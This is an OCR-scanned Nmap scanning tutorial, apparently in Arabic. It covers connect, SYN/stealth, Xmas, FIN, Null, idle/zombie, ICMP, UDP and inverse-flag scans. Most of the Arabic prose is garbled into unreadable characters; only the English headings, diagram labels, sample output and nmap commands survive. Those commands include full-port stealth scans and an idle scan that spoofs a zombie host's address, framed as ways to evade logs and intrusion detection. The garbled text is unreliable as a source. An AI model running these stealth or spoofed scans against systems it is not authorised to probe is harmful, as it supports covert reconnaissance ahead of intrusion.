.scan ^» > j AjUijU 

.I^jJjj ^1 <j^aai]| CjUjSj j jUaJI fAl j-ftl j^l jkuu ^ lj-4l±iluul iLjL j SI At d^J J^l ^1 £)Vt J&Ij 

Using Nrnap to Perform a TCP Connect Scan\Full Open Scan ■ 

^Kiail! ^j^l liA jl c_uuij .(Nmap)^Vl yi ^^31 iaUJI J£ ^ Three way handshake J^j J j^Nmap ^ j 
.(crashed) ^Uajll ^ ^ c^j^ <lMj J-^VI <jlij ^ Three way handshake ^iLc ^ <-U*j 
4il£ (j^ai Ixjb ^jjudaJLouJI ^ , (1000 port)^- j^ 1 iaUxJI ^aaij l_a jjui Nmap tisLLall (j;!*-* (jUaj aj^jj lit 

^1,^ lull Ljajl ^^-^a JJ .Nmap lS^*-*^ i ^ c - " -p- " L^J^ 3 Cf 0 ^^3^ ^-lAa. (j-^aai <aJ _^jJa! jjaVI/^^juAjS J^*3^ lA^ild ^^Jc 

Nmap (hosts discovery) u j^J ' ^^ JjL*j ^ " -p n " ^^1^ .Nmap " -Pn " l^.^ 

:>tljSri jkyi <^ ^UJI (TCP Connect Scan) u^il) (> ^jSM 4**2S1 



#nmap©-sT©-p-©-Pn©192.168.18.132 



o- 2 ^^ nmap jW^-V (-s) ^ 



.Nmap (_3j-^^ ^1.^ nnb ial_L<JI <j-*aai ^ ^aJI j^^jII b^ ^Vimj Nmap 
TCP Connect Scan c> ^I^L nmap jW^ ^ e^ 1 ^ -sT 
.TCP Connect Scan J\ t > ( T ) e^^J 6 ^ 
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^UaiSl L5 ic Ajjal\ gjA'S (Jr^i^ql ^AikJjuaJ -J). 

^1 ^1) Ja«JI 6 jLSI ^Paxj V gjil! £^ t^Jij live host discovery ajj^U. ^ v^ .. n -Pn 

.IP jljk, d& Axj ^ .(PING J-bU «.n^..n V 

[nmap©-sT©-p-©-Pn©192.168.18.1-254] ^Vl Ji* IP ojj^ c> JU* j\ jIPjl> Ua 
^ .^L o^UJ! Nmap j-bU "-iL©path_to_the_text_file " ^ ja^\ *iLiL fi ^ J>** t> >-i^Jl 

.^Ij ^al Igj^lLujJ ^iiijJaxJl (j^a^Aj till 

-iatUI LiLuu£l ^5 nmap >*Vt S jia 
(Three way handshakes) jilUI 4JU ■ 

nmap J^J^ c> jW lUjj . Three way handshakes^ q^JW IIa 

t ^12! jl^JI ^ jj ^(TCP SESSION)TCP 64*- ^ OSI MODEL Jl c> W ^ ^ (^ jj^ 

^ CjjjJI jl (nmap) j-^jJl ^j*-?. j RST ^ (j^j^ 3 Jb-^VI j^-g-Sl 'j^' j 6 c j-^' ^—uj^ 

(vanilla scanning) iHa^M SUaI) 4JU <^ ■ 



^ Scan result when a port fs ppen ^ 



m+mi„„„ 



Attacker 



Target 



result when a port is tlgsed 



SVN facket + Port jn] 
RST 



Attacker 



Target 



.(log file) J?-« J 



root@j ana 


: ~# nmap -sT -p- -Pn 192 . If 


58 . 16 .70 






Starting 


Nmap 6 


.40 ( http://nmap.orx 


3 ) at 2014-C 


)3-21 00:1 


1 EDT 


Nmap scan 


repor 


t for 192.168.16.70 








Host is up (G.0 


062s "Latency) . 








Not shown 


: 6552 


4 f il_ t e r e d ports 








PORT 


STATE 


SERVICE 








135/tcp 


open 


ms rpc 








139/tcp 


open 


net bios - ssn 








443/tcp 


open 


https 








445/tcp 


open 


mic rosof t -ds 








554/tcp 


open 


rt sp 








902/tcp 


open 


i s s - re a~L secure 








912/tcp 


open 


apex - mesh 








2869/tcp 


open 


icslap 








5357/tcp 


open 


ws d a p i 








10243/tcp 


open 


unknown 








49155/tcp 


open 


u n k n own 








Nmap done 


: 1 IP 


address (1 host up) 


scanned in ] 


L05.92 sgci 


ands 















Using Nmap to Perform an SYN Scan (Stealth Scan\Half-open Scan) ■ 
SYN o-^ Nmap 6 ( -s ^l^kab) o-^^^ ^ y uj^ Nmap >»Vl J^-^ lij .Nmap ^ 
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V j TCP Connection Scan t> £>J ^ j>a <<^l j^V! jUiJI jA SYN J t> J°$\ ^ j^j j^ 1 
lJ^JI ^Uajlt l^Ij j) (Denial of Service) aij& jl 3^aJI jUj^JI <j* 3 Lj > >> 4_^ja ^ <iJ Jljj 
4_iLc c> M^'j JjVl cj!j]^JI lU^j <jV g^j^Vl ja SYN Scan .(DoS 'ing or crashing the target system) 

.The Three way handshake 

o4 j ^I^YI <ti*U ol c>» c»SYN/ACK j ^ j ^ Jj SYN Jl- jj ^ ^ 'SYN Scan J 

lUjj <ii 4^&]| ACK ^> JL- J c> jJI ^ ^ ^ j .TCP Connection Scan J ^ (j^ 

^jSj jl ^-i^j .oOU^ o£ J^YI Jptelj 4JLLJI e >Jl c> c^l JaUIj U^JI jl^JI j^i RST V> .<^l RST 
SYN Scan ghviml jjjjjja^l 4_Ljja3I ^ jaJI ^ JSi ^Ua jl ^ SYN Scan J <c jjuJI s ji* ^jl U>^1 j 
^ 6 jjj£ <c < Lju^j <ji3j to jjj£ s jj^ j^jj V ^ ^ jaJI c> J^ ^ t> ^ J^ ■ TCP Connection Scanc> 





SYN (Port BO] 






SYN + ACK 


m 




RST 




Bill 

10.0.0.2:2342 




Sheela 

mo. 0.3 m 




Port is open 




Bill 

10 0-0 2:2342 



Sheela 

10.0.0,3:80 



Port is closed 



cilLj U o^-^ J^ J^ SYN Scan rf* J^ (Three way handshake) *jS5151I £°L^1\ JliJI U lij 

.6^1 j jj^j JL^jYI Ja£5 <LLouj 4 ?? ?U^j^" Jjijj lJI^J! JaSlL (answer machine) JW*^' jlf?- 
jLau La LJlc. to j^l c . ujuaj . (stealth)^-— j> lP 3 j - **-^ l£ ji>->^ j^jj 4djVl^Jl o^su ^ <j| ^a SYN Scan J c5^>^^ *^ 
.U.l£ ^il^uJ! ^5 V Ai^J! J -oV aJc ^V! liA (i^Lj Stealth Scan" SYN Scan 

Jji^uaaj ^ I^jj ji Jja (Three way hand shack) <^iL^3i ^ ^l^VI c-ASaii ^1 (log file) J^- cjUL j djllniaj ^Ua 

^^AJJ .CjlluSall) (J^H J^ L>^ ^l*^^ ^ I^A L^^JJJ 4^.1 j jL^ajl I^J) J^J ^3 4jI d-U^SYN Scan ^ J^- 0 ^ ^ liA J .JaUlj (j) 

(Jp. ^^LjVIj <■ ftj^ l^jLi ^ jJl A-d^klalxJl (JLaul! C ftjj£ 4 <JaJ| j <JJ^aJl <JjU3l ^jlj^aJl .Sjpli QdiA J f UjIujI )^A (jl Aia^^Lft 

^ ^ jj ^j^i Jl ^U-j V ^1 t> ' Nmapc5^ cH 31 J^^ 1 o-^ 1 j^SYN Scan .SYN Scan 

.(J^ailt ^ JJ AJ^JL jSj jjuj 6^l«Jl£a tLljUjajLajVl Jc j^JJ UA UjV ttilli j .(-S) 

: Jtilt j^Sfl jt^ajj (terminal\command prompt) j^tjVt jkw SiaU tiUl^ 4 SYN Scan J^iU 



#nmap©-sS©-p-©-Pn©192.168.18.132 



T j^*^ Ux»^1ujI U£ ILLuj UjI j^iijj SYN Scan uj^ ^ o-^ill ^jj jl ^iJlj S j^*^^ (-s) j^*^ Uxi^kiujl Ua 

.TCP Connection Scan J^ u 1 ^ l^^'j 

a <J^jV1 Jc; JaxJI ^ -G^liSl ^1 ikl^VI ^ U j^Ij nmap Sbl J j^atl c_iJLaj| Jjjaal ^1 c_j jLujVI 11a ^xj 

^aaill liA Asu li^J j ^a^ill li^J lOgS Jj> * ^ali (jl jL^ajl A ^ajL V (J-^a^ill liA (jl Iaj Ljajl .CjI^JjuJI j 

.(jjist-d L_flAA (J^a^a ^UjI C5 i^j3l L_u3Laj| JjJaSl 

(43 privileged access -S :u^**}i O* £jtit Ija cjjm> 
Using Nmap to Perform an Xmas Scan ■ 



c^j Request for comments ja ^Ik^JI li^J J^JI C; ^JI (RFC) 4 jjj^II ^ ^ 
Jl 6 ^ Ja£3 j IETF ji Internet Engineering Task Force ^ j*i aAj± a^i* 



J£joUj A aIlAlh (j-<uia ^jL^jI JjoOJ JJ jJJx^ll 6 j^J>l ^UJc j (jjj^i^l ^JJJ ^^A j lA jJjoiJ ^^jII <>JajVI j dljjjjVI JaC t il j£ jLoj jjjuofljj 
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t^UajJt JaC A-ajjjll Jjj^aliSl! t L^aJ RFCs (jV . j^ f^-^ 4_lLkWI jUc^VI J J^*^ c> ^ J*J^ RFCs 

-( jjjtj jll ^ 4_^jJa ^lai^xJl CjI^suII jl c to > Jataj jc RFCs UJ' U^"^ jjN>n*^l J j^^-g-^ 

.Cj|>!i3l JS* Jii^ null scans j Xmas tree scans 
4t ilil i^iij j^on^j^ jj£i j <*>JI URG j 'PSH 'FIN j* J£ <jV Xmas tree scans 

<jV <jI*-11 ±ism jjc; Xmas tree packet j' uj^ > ^ j uj^ u' c^*^ ^4* «$j55131I A^iL^aJI j TCP ^VL^il qc> JxilU Ai^u 

f >JI j* cUjj U£*j <TCP RFC implementation (RFC 793) ^ l^ 1 ^ ^ g?^ ^ ^ 
'SYN CjU5UI V ^J&j ci^c iiiall jl£ li! <j| TCP RFC J .cjIjjj^I/juIiJ] ^ jll iplc. 

V tU iiiall jl£ lij <j| RFC lk^j Sj^j ^UJI RST ^ iii^il jla 'RST 'ACK 

I^jV j^Vl jiSLaJI <^ jtt .^>JI J*W^ a 1 * 'RST jl 'ACK 'SYN ^ 




Attacker 

iao.o.6 



Port is open 




Port is clo&ed 



jl JU^IojI laiJl <!U. ^j^i tjic. jjlS Nmap 'RFC TCP ci^^ ^^Ji ^Uaj jl L ^\J^\ 

. Jj^jj IjUxj V jilj o^jjjj u^jiJ Jji^ull ^ iaia IjIaxj null scanj the Xmas treeu^ cJ^A? .RFC ^ 
.dia jjoj jj^jU Jj ^o SI ^Ikb Jasu ^1 AiJa <!Ui dual null scan j Xmas tree j 
:JW* (-sX) C^ 3 ^ (-s) X j^Jt ^^aa^ UjU Xmas tree scan 4*121 



#nmap©-sX©-p-©-Pn©192.168.18.132 



.IDS ^ajujl AiLoU^I ^aJJ jl Ljajlj ■j^-vaU j^J logS Jj? ' ^ j^ ^1 JIj^jI A i ^ajL V 

.Windows ^^-^ <>JajVI lU*^ Vj aliii privileged access -J £^ 

Using Nmap to Perform an FIN Scan ■ 

FIN lUjj J^*]> >UJI u -aai ^Ijj! jx ^jj FIN Scan 

Alk M\a\\ jl£ lij jl J^ul) ^jS dbaJ ^U^kJl dyl£ lila tcJ^Jl M\a\\ 

.RST ^3^^ f° ( ♦ 



#nmap©-sF©-p-©-Pn©192.168.18.132 
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Using Nmap to Perform Null Scans ■ 

J TCP ^->VL^I V jll ^>J! a^jI^a iaiiJl cjL^j^i a^ja^a ^ ^Xmas tree Scan 'Null Scan 

[flages] cjU51& J <> aJUJI ^>JI Null scan Xmas tree scan c> J^ j* Null scan ^Ijj 

J^ .Xmas tree scan J*' aJL JJI (Null Scan) a^jLII <j-aaill cjLLc Jl < jjyiun cjj^ Ai \pm^ l a^Vi 

^jl ^ &1I .RST t° ( ♦ ^* ^ iali-<JI Cxf* J '^j J lS^j^ ^Uaill Jc- jjLaSI iat_L<JI < 

.RFC TCP ^100 t3*> J 15 J 5 ' J^-^l a-J^I ^ lU»j ^ j^ffl cjUL^ J 
^ Vij . nil t cjU^i jA\ JjUj Jc I jiS ;CjVUJI o^xj J <j\ j& Null scan j Xmas tree scan J^-^ aj^uj jll LI jA\ <> s^l j 
Sjjlill (j-d ^ jilt 11a jit SYN ^ lU*^ ajjI^JI jj^UII ^ c>asu . J jj^a j3L ^l^jll ^jI jS j (simple filter) 

jjfL <jla <2LS51S1I Aail ■ aJI dj^i lili .TCP JL^iV A±Dl!i]| AaiL^ll ^ Jl ^tkdl J SYN ^ <*l* 

.TCP J^3l uj& o 3 <t3^ j' '<*^ o£ TCP JL-aSl *^La 



Port is closed 





Port Is open 






TL.P F3<kct with NO FI3R ict 










Nn Response 




Attacker 




Server 


10,0.0.6 


10.0,0.8:23 




TCP Packet with NO Flag Sat 



RST/ACK 



Attacker 
1.0,0.0 .6 



Server 
10.0.0.8:23 



iij u ^j^j] j& aK \j& <> lJ^JI . JL^jI J 3^131 Jl j^-^ V Null scanj Xmas tree Scan c) ^ c) i> 

4_*Uaj ^Lal la^JudJ AjLaa. jl^la. ^jJa 4£jjaJl J jluba ^alia 4£jjuj LjJ ^j) (jlajjij -C5^^^ JLaII ^ ^)Jai3lj ( jLjcVI ^ ^jjjIjI uill ^jjjjaflll ^ 

JL^jV J jVl TCP connect scan o-^l ^ ^ .4^Uij o-a^il AjUl^VL a£^J! J .SYN ^ 

.Null scanj Xmas tree 'UDP scan -u^i ^Lj jljlkVI jfi^ .^cr^ 1 <^^Vl j^WSI 
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.IDS AJajail AiLoU^I ^aJJ ^jl Liajl j ^aaill I^J lOgS cJj> * ^ ^ O 3 CS - ^ ^-L^ JL^I A uala ^ajflJ V 

.Windows ^^-^ ^JijV! o^xj ^ Vj <>j oiiiii ^ privileged access -J 

IDLE Scan ■ 
?Idle Scan -1L U jl t^UJI ^u»AS ^ U 

^ U Ai^xJ jjj^ (spoofed source address) jljj^ JL-jV l^l^i^l jSaj .oaailL ^IS 

jj jjj^ JIajjI (JJ^ia (JC- j^-^j 'A^-LaII diLi^aJl 

'"zombie" cy*^ ^ ^^-j 6 t * a j 1 u ^ - ikiLaLj ttilli ^ o^j (j^l^JI IP Cj\ A^j^- aj' J^jj aja ^jj ^jl ^aaiH 11a 

c fljjJa^H (_3^^ .ZOmbie c fl^a^lj IPID (J-*-^*-^! (*^J' ^ C^^ 3 ^ .A^ J^JI ialL<Jl ll^i j ^J-> jli c Luja^H ^j^aail 

.zombie t %^a^ll o-^^ c^^^ IP ul^ f u ^ ♦ ^ t jli 
lldle Scan 6^^* u^iJI L^jjl* c> Jll TCP/IP ^L^L^I o^u 

^ Jl ^tbu t*l&l .4^i3 TCP/IP J 1 uj^ J ^ ■^ u ^ 1 s J^ 3 ^ J* [Wle scan] o-aill 
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tit jiiLi iiidll jfi*^j .25 ia^JI ^jjJI j 80 i^JI ^1 ja. 'TCP a£jJo3I ^jI «>h» ^ 

L_fljla3t ^13 lili 6 jL^ajl *Lij] ^ CS^'j SYN £ l>> J^jk f -V ft £ J^La TCP ^>*-^ 

^ jjLj iaiJl ^isu jj^i "JL^iVI *LuajI <jc.j ^ Aial jxll <^1" SYN/ACK £ jj c> l^lc jjlU j^Vt 

iilalj ^^isu ji^i .RST JJ L>* ^j^H J^Vl t_fljUt ^jll *L»> tit (j^lj 

e-Lijlj L-ilL J^jj ^ jW^JI u' (*^J 6 J^-^Vt (Jaljj <ut .SYN/ACK fJ* >>i j c£> 

_> <J ^ill j Fragment Identifier mjSII J IP Identifier f^J W Cj\£j^3! ^ <^ J\ 
-J' Cj* probe y (jiaalt ^-A^r> ^UlUj tlg-Luijb ^ j£s J£3 liA jj ^ j£i l$J£ ^3 j) JjiJdt .IP ID 



ataj ^ji ^iLiudj <jV I^j ^3 probe c3*^ 4_Aac ^kt ALa IgJL o jj ^ ^ 1 



jl jiaj IP ID 



b(4 j1c. UL^ ^ill IP ID j« 
„ jn^^lL "zombie machine" j^h <fr u^J ^^J^ jjjjj j-a 4^i^L n<ilt 4^uJt ^L^l t^li^Jl 

: Idle Scanpj^ 6f (Scan) u^ai J^p 4ijjla 

L_fl^JjauJl jtg-a. A > ^n^q ^aJJ (_^i3l (j^-d c^^^li^ 6^ J^^j M\a\\ <JLa. j)C ^>lai3l (J^axJ Ia jlj^J ^JJ > o dl! jjn^ Cj^Ij tilLiA 

^jll <J SYN/ACK ^> J^jj t> '(zombie)^^]! jl^=, ^ r >JJ IP ID -SI t> (i^JU e > 



Attacker 



IPID Probe SYN/ACK Packet 



Response; IPID~31337 

RST Packet 




Zombie 

^1 j^JI JLojjU ^ jij .Ai^jjoi^ll <^aJI j(zombie) > ^1 JU^ajl pLuajj ^ <jc. j cilli j SYN W 0, ^UijU ^ jij 
(j^a^Al! a A ac> ^iij ls '^ (j^aill u^jCzombie) ^^auJall q\ ^jja j ^ j ^I^JI c v^ll 



Attacker 



SYN Packet to port BO 
spaafiiiH fOinbi« EP address 



m 




^ 1 

jj#3a0« Target 



Attacker 



SYN Packet to port SO 
spoofing £ombie IP address 



^ 



I 

Port is open j 




B 

Target 



Zombie 



Port is closed 



lS^-^j <J SYN/ACK J-^J c> j^' '^(zombie) ^^31 jt^ ^ ^>J3 IP ID -Jl c> (i^^ ^ 
S jlaaJI UL — ^ill ^aj3l ^ s jJaiJI ^ UL — ^il! IP ID -SI .RST -Jl ^ ^^*JI ^J^' 

/ > ^aJ (J?^\ ^1<JI AJL^. L-Lud^ J^*^ J' JJ**^'" .(1)^J 



Attacker 



IPID Probe SYN / AC K Packet 



Response: IPID = 31339 RST Packet 

IPID incremented by Z since Step L P 
so port SO must be open 




Zombie 
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4_l^jJa3l Aj3 (jj^J (J I t ; T>J li& jjuJI lat-lla jl-^> J^-g ^al tjx-a ^\ t£ M')a\\ <Ja aA^su* Jl JU <jVI 

J^j^JI 4 it > JWLj IP ID -Jl ^Sj oj^j ( *«fojni j£i U ^.ixL^ t*Ui . (Idle^j^ J Zombie -II jl 

: jVI .(2) o^l j' (1) ^ j J ^^31 J^ IP ID -SI u~VI ... jjIjh Jc 

bj ^jll j j <j*jz>. ^ jjuj JLojjU ^ii ^Zombie /^jauJalt <j) ^^-i*^ li& ^1 j jI^j IP ID J j£**^l b] _ 

j^j ^jlb US 4il jl J jib ^3 <jj Ul c_fl^l j] Jc; S jSfl lliSasu liA J^bj . . . <j-£i^ia3l t$J US ^ilt (S YN) (jftaJiII ^ J^ 

.jl** iiull jb ^.ixj b* jZombie /a^jJI I^IaUj b$] j rst £ jh 
A^j^ Jc^ bj S^lj . jjloj^ JLujjU <Ua ^uJall jb ls jju li$i ;(2) jl*^ IP ID -Jl J J£**^l b] - 

jj Jc 1 nViTj liA Jblbj SYN/ACK -* ii^l J^ l9 j=^j .o*^' ^ ^ (SYN) Ja^I 

Idle uj£^ J V** ^Zombie a^jJI jb c ^ li^i ^2 c> IP ID ^ (i j - 

^<9jS^ jjc. U^jIjj ^UlUj AjSjaa. 

.jjILJI iiiJi jl ^^IslxJI iiiali jjj Ulxi jl ^iLaioaj V Idle Scan 




iP 10 = «M3 




RST 
IP 10 ■ 




KST 

IP ID = 4^Sfll 



■ c- ji. La. a 



□ 




IP ID - 44502 





RST 
IP ID = 44501 



iiiJD i,/"^ 




P3T 



4jU ^bdl 




n 



R5T 
IP ID =445S1 



<h£C*3 ilj-oJ! jLg^tJI 
q^L%5 jjoJI cSJLgJI lSI J][| [ 



Idle os$j cSJJI 



Scan (j^toJI jLpr 3I 



□ 



:^iUJI j^Sft J51a iLLuuj d]3 Lajj ^jj .Nmap 6^ Idle Scan 6^^' o^ailt ^ uL£ ^jU ^Vl 



#nmap©-Pn©-sI©idle.device.com©www.target.com 



ICMP Echo Scanning/List scan ■ 

(J-g jjc jj VI lS-^j^ V tl^. ^a^ill 11a .V jl <£jjoJ1 ^S ^.1 jILd jl^-aJI <jl£ jl Ai^stxJ Ja^a 4 ^1 ^ j uW^-^l O^*^ 
jl£ U lil j* jL^il] ICMP Echo Request *^Ij 6 e j^t i> 2 ^ ^ oaail! jj^l ^ >JI 

JU c^^l J^l JU^I jj) 1^1 JW^I bj ^^^j ICMP Echo Reply ^ j ^ j V r i 1^1 jl^JI 

^ J^j jla a£j^3I J JU^JI l& j' W^j ( Request Jl 
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J Sj^VI ping lU- Jjjla jc- * u>l£SV j-aai J ICMP Echo Scanning lij 
J TCP/IP ^ ^1 (J BSD based machinej UNIX/Linux J ICMP Echo Scanning 
ixjiSll c^ill J e ^kia£i jl ji*j V ^ .broadcast u^j^ ICMP Echo Request Jl ^ JjiJSSlI 

^ ICMP Echo Request J^J! ^ Jj <U^1 jSal U^j ^ Jj^jj * >J TCP/IP jV Jj^j Uj^I ^ Jc 

.Broadcast CxJ^ Jl 

^ ICMP Echo Scanning >U*1I j-aai c*1Lj V -ul L£ ialiJl LK ^li <d£ ICMP Echo Scanning jl J) J 1 ^ V 

I^Vl^ ^Ui ^ii .Iju-^ ping lS-^ l^J 3 j^ ^ ^ OsP^I ^ cJ^ 2<^>* ^jiLjaxJI ^j^j] iaaa 



#nmap©-sP©192.168.219.0/24 



jj^ IPs/Names^ List scan .6 j^>W* J .k^l < LjjaJ I lJL£&I <List scan J 

JUa t "not scanned" W^-? IP u^j^ £j Am >) ^-^li jj^^ ^ -> jn j .iaLLal! ^j^ai jl jjqj> >>^l s-Luj/V ping lUc- 

(J jj ^VUJI J ^Uill j£Jj f j*- J-^j) uj^ j^j IP o- 3 ^ ^ List Scanj^l j* -(0 host up) 
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.fUalSft j& uLiilt J S-uL* List scan 
Using Nmap to Perform UDP Scans ■ 

y& jl a^ij jl 1,1a. ^-xJl jxa .UDP jC- IjUirj ^ajl AlaJl JjljUa-VI (g J."^ ^ 4_l>->ii3lj ialL<J! <J^aa*2 J lc jJjuj s-Uaa-VI j* 6,la,lj 

^^axJI ^jjaau J^l jjll jj j;n^! s j^V jSaj .^j JL^j^U ^Lis TCP U^kiuu SYN Scan j TCP Connect scans c> 

. j£ jjjjJ! o^j Ajjouj J! Cjla^lkV! c> ^jAxJI cilUA <c*13i ^UDP jt TCP M ^^l^W 
.<i^l3^ ^ IjLj jlj ^^SJUIj lU^JI ^> J£ ^ J^IjjII t .ilVin <jV " connection-oriented protocol" TCP jf^j 

.-ujLo Jx^i ^ jaJI jUjjal Hjfl ^ ^tiJl ^ jaJl Jjuj jj <LLouj Jjuj jxll jV " connectionless" uj^ 

jj^ajc Ajj^iill a ail > ^i^ll .^j^ ^jUtj (three way handshake) ^^iii a ail > .^^^ ajLic c j ^j* ^3 ^—^ j J 

4> ^jjII Ija < q>^i j ^jj ^1'^ i JL^jI Jj^ UDP uV .Jli j J^ j >^ Jll TCP ^VU^iV 

^jJaJj 6^jjj ^1-^ ^jJaJj ajUU/t oU Jc ^Vjj jixJ! ( . n£j JjujjaI! tdlVl-aJl ~ a J .'■^O^ (jj.Vu J ^JjJ JalLajl£ <JL^jV1 

lAA J -c ^jjjj£3VI <;ia, jjll ^Uaj J l^Jla,^) ^ ^a 4JLujj3I laalijj ^JjJl ^ flUa^ll AjI^j J .^J^ (JjH^a J <!Lojj3I 

.Ajjl^ilj Jj Jj^aJ 

djU^aJl ^> ^jAxJI .TCP ^^aajoaJ ^U^a, c>J <ji J^i^ 'UDPj TCP U^? (JJ^^ J ^ Uj>ni ^ AjA jVl 

jjSVI CjIL^JI ^> $:iaJj .CjULJ! Jij Jj£ jjjjjj t^iajjaJl a<>u*\\ Sjbj J j£ jjjjj t DNS'DHCP ^ J UDP 'OjW 3 ^ 

,L_fl^Jl ,Ua UDP C-H^^ (J-j*joiJ CllLaij tiljV <-<i^a, jc Jisu jl l^a, La,jawd j jaJ i o ,4i^3l ^^Jb (jljla,VI Jfla J 

CjU^aJI lJU^I ^jjj U£ lil .^j ^aUJI ^-aaill c_jUii3 ^LujI^ TCP uj^ ^" ni J SYN scanj TCP connect scan c> 

A laJjaiJ 4_iiAxJl Nmap < laaJI jjoiaJ .UDP ^3^- laJLujl j ^aai ^U^jV Nmap ^^"jj J^ 6 UDP laJLujlj 

;4_ij]all J Jl3Jt j^Vl J^-^ tUa^A ^xia UDP J^^^ JjJLJal .l^a, 
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Q^ai Jji-uu Ja f Jaj UDP .^^i ^ uifyJI .(j^ailt j-a ^Llluil aj M -Pn" J "-p-" J^*^' jl iaa,!^ Li j*Ji 

.CjSjJI j^ Ijj^ IjlJLa IkL 1000 ^ o**k (g\ cr^lj^VI J-^ajJI ^ UDP 

JU3U cjIiJ! J^»j j^ ^tL V UDP jl ISA*- UB U£ 

UDP ^ J^J^ lij Lt^au jl 4ja, Jik* ialloll lij U ^j^j] l^l^klujl cilj£ oj jllICMP ^ka> JjLojj jj^ 

.ICMP port unreachable packet LLa, aJI^jj ^ ^ J*^ ^ Jj ci^ 3 ^ 
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^ II jl^a. (Jj3 j>* ajlilixa jl 4_a. jlii-a Lai 

Are VP" uperi on UDP Port If? 

Ho response if port is Open 



A 




If Port is Dosed am ICMP Pqrt unrrsch.ibir message is received 
Attacker Server 
JS* Lu^i jjal(lCMP port unreachable messages) ICMP LkaJI JjLujj ^ o iv r ^^ lA* uW^ 1 J 
J $jaJ j (ICMP port unreachable messages) jit i> ^ 2.4.20 < Jliall Jc .u^j^ j <l>^ 

.(net/ipv4/icmp.c) 

< 'A^j*> Jls <j) ^jIS J^jj j^r^ d& ^ . J^ >; ^ Cy ^-iliajj V UDP ^->Vt^l jl jl ^ r & 0* 

t^J 'UDP ^3^ ^—^j <LdjaJI b] t^jaj 6jU*jj ?(^jU jl-ia.) j^-* jii&ll j jiii* jAi^I! jjj ^jjjfljll Nmap ^ 1 ^ 



aA a^W j|ja> tjialbj "jl^jlc cji^aa." 51jIS JlUll Jl <!Lojj Jjujjj V j£l j ^Uj^JI <LLauj Jj£ jA 4_x>jaJI ^jUII ^ jLaJli 

eJaJj 4_x*3^' lA L>* f^ 0 ^ ls^ 0 6 lS^-^ ^ J . JjuJ^JI 4_jL^Jjoi! cJ^jj 4^3^ ' ; J aulujl <JaLaUJ jAj 4_l^Jj| JJjojVI 

jaJl <J jii ^aJ lil Ai^xxJ <LjIa tilLlA (Jj^ 6<Jjoij>JI Jl ^3^ L>^ *M ^.^j) (*^3 ( ♦ 'S-^-lj 4-*3^" ( ♦ ^ a ^^-^ L>* ^—^^ 

aaJI jlja. <Jjfj j>» 1 g ul a\ J j| 4_*.laJ| <Jjjj j>» 

c> Nmap J^ V j . jSlLa jl ^ jSL* UDP jl£ bl U ^^'^Nmap J^ ^ l-jx^I j* Jxa_j jilll bA 

SjjU cjVU. J <jl Jaa.5Lj ^Jl t> ."open I filtered" * » ^a c^^^ '^^^1 ^JLojjII x^jj l^Jli t UDPo^ 

x-dlaaj ^ jjja jj i^IUa jl ^il <jU^3I Loj ^^Nmap t^VlaJI *>^a ^ . j^axJI bj Jjujjj ^ jjuj UDP jli 

.^a. jVI c^'^pen I filtered" ^ cJ^ Ujj^ jj jlxJI c> 1^ JJa ^ Jl ^H^j UDP ^ L >^ai jl 

j^^^jai <J£ ^aij ^aJ ttilli x-dj .UDP (J^^ ci^f a lia J L-1L> jl cJ^juJI j-<^ iA alia aII jjiiijJaxJ! j>» ^jAslSI Jc ^-l^)a.yi (Jj^ ^JJ , ^ S H 

.lij^l UDP j>» J^l (j-a^kloaV <3Jjia jfl jj Nmap L ; ^ill (JjjUII 

^jj .UDP c>aai J "-sV j^l^I uLuaj jl LUI4J cjllLa ^1 ^ jlLd liloJl JA jjj Jjjill] j U5JA jP 4iJ jj£I <A_nj Jp Jj^aai] 
B LLil j^ftt) ^jUj j j i rC\ J Luajj JpLuuj jl jl^j c^Jl^Jl diA J t jl! j j^i^^l 4a<.iu ^iua j2i "-sV" ^I^L nl 

jc aILxjI ^ ^ill "open I filtered" Jj CjUjL^ J^jj Nmap 'Version scanning ^ 

dlxjJa j ^»3^ 6 ^ ^.l^jll j Jc. dlxjJa j cS^j] (J^J 3 ^^•^aJl AjAaal a} jLa-xi AjflLjaVI CjUjjajll 6^A .(j-aaill (_3^^ a 

jj£I aJj <jlxxJl ^tjlUll J;ixj L_fl jjuj 11a t jUa.VI j-« J S'^-Sl j-« <jLalujl SjliLuil J La.LaJ jj£I jj^J Lft Ullc. L^a^ 

All 
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Using Nmap to Perform Inverse TCP Flag Scan 



fjc. ji ( PSH< URG'FIN) JS- (TCP flag^^Ull r lAk3«» JiU & iaUJ! o^il TCP f > uj 1 - u>^W^I 

tl qU a jj^J LdAjc jjia. J 6L_flJjJaxJl j-d ^1 Jc (JjuaaJ V ^al^xJl jli tLa. JILa M\a\\ jj^J LdJjc .CjLg^^IxII j-d ^1 J ja. j 

a^JI cAi^ll j^RST/ACK 

.IDS J AjI^JI jl L^Vl CjUll ial^aJ Jj 1^/^ ^JJ C^J^lauill C LljJaAll ^LuoaJl Jfllloll Jl l^Luijj ^aJJ Jit SYN ^3^- 

. JauoJI cjUL J SYN Scan c> o-^ 1 ^^ CjUJxII j^ Jja , , nl ^a ^iun Courtneyj Synlogger ^1 jjll/^ HnKiti 

jjj jxi jj^lill jjc; jl tdjtjjjiJ! (j-aai J ^JaJjouill (TCP flages) ^-J^^*ll ^— lb TCP (»J^ o^*^ 6 uW^^^ J 

AjAaII j-oVI CllLllI Jc IjUucI tl^jjuj£ ^aJJ jl 

j^^ yr* Ija ^5^-jj .inverted technique ^ Half-open SYN flag <^ ^^-^ 



Uj^ j 4 JL^jVI j£ RST/ACK J^jj ^ ' RFC 793 Via jj .^ja.1 s jjll JUjI i^aa Jll 

jalL<JI J£ Jl 4 alia a\\ CJu^jtl] dib TCP ^3^ J^jV *^3^^ 6 ^ cl^ UJ'\ffi u, J UJ^W^^ > ^jaxll L_uLa. j^ lalxx iiL<JI jj^j 

.L-fiJ^Jl L-flJjJa^ll J OJ ja. j^ll 
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.FIN flag *-5UM t-TCP FIN - 
PUSHj URGj FIN <^>U t- TCP XMAS 

.cjU^UJI (> jj^ TCP NULL <*> - 

SYN/ACK - 

L-jjoiai ^^ic tilli j tRST/ACK ^3^" cJ^J^ ( : L>^ 6 ^ (Jffiun L_fl jjuj ^^jII AilsLxJl ia\_L<Jl 

.(log file) Jj> > ^ liL j ajIa^JI u'j^ j IDS i> c ><>>: ^ < . iqij 

„ jjAlij (J-lT-uull A ahM £a (Jlxi JJC. j (JJ^J> ^all (jja£jjj/(j ^ixjuliII <-<daj| ^Aa^LujJ t^j^aJl ^.I^JjoixJI dil jLiLdl ( . lllaJJ 




Probe Packet (FfN/U RG/PSH/N ULL] 



Attacker 




Attacker 



No Response 

Port is open 

FIGURE 3.37: Inverse TCP Flag Scanning when Port is Open 
